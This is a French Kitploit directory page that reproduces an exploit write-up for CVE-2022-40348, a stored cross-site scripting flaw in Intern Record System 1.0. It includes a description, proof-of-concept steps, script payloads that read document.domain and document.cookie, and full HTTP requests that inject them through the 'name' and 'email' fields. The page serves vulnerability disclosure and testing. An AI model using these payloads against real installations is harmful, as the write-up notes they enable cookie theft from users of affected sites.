Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated — CVE-2022-40348 : Intern Record System - 'name' et 'email' Script intersite (Non authentifié) | Kitploit
Outils/GitHubGitHub/h4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubh4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated

CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated

CVE-2022-40348 : Intern Record System - 'name' et 'email' Script intersite (Non authentifié)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
32il y a 2 ansPas encore vérifié

CVE-2022-40348: Intern Record System - Script intersite (XSS non authentifié) via les paramètres 'name' et 'email'

  • Titre de l'exploit: Intern Record System - Script intersite (XSS non authentifié) via les paramètres 'name' et 'email'
  • Date: 2022-06-09
  • Auteur de l'exploit: Hamdi Sevben
  • Site Web du vendeur: https://code-projects.org/intern-record-system-in-php-with-source-code/
  • Lien du logiciel: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip
  • Version: 1.0
  • Testé sur: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
  • CVE: CVE-2022-40348

Références:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40348
  • https://nvd.nist.gov/vuln/detail/CVE-2022-40348

1. Description:

Intern Record System 1.0 permet un Cross-site Scripting stocké via les paramètres 'name' et 'email' dans "/intern/controller.php". Intern Record System est vulnérable à une vulnérabilité de script intersite car il ne parvient pas à nettoyer suffisamment les données fournies par l'utilisateur. Un attaquant peut exploiter ce problème pour exécuter du code script arbitraire dans le navigateur d'un utilisateur peu méfiant dans le contexte du site concerné. Cela peut permettre à l'attaquant de voler des identifiants d'authentification basés sur des cookies et de lancer d'autres attaques.

2. Preuve de concept:

  • Requête Burpsuite sur les paramètres 'name' ou 'email' avec des charges utiles sur http://localhost/intern/controller.php
  • Accédez à la page http://localhost/intern/view.php
  • Actualisez la page.
  • Le XSS sera déclenché.
  • Une alerte apparaîtra.

3. Exemple de charge utile:

  • Payload-1: <script>alert(document.domain)</script>
  • Payload-2: <script>alert(document.cookie)</script>

4. Requête Burpsuite sur le paramètre 'name':

  • Injection:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 78  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=<script>alert(document.domain)</script>&email=&phone=&deptType=3
  • Page d'identification:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

5. Requête Burpsuite sur le paramètre 'email':

  • Injection:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 153  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=&email=<script>alert(document.cookie)</script>&phone=&deptType=3  
  • Page d'identification:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
Télécharger l’outil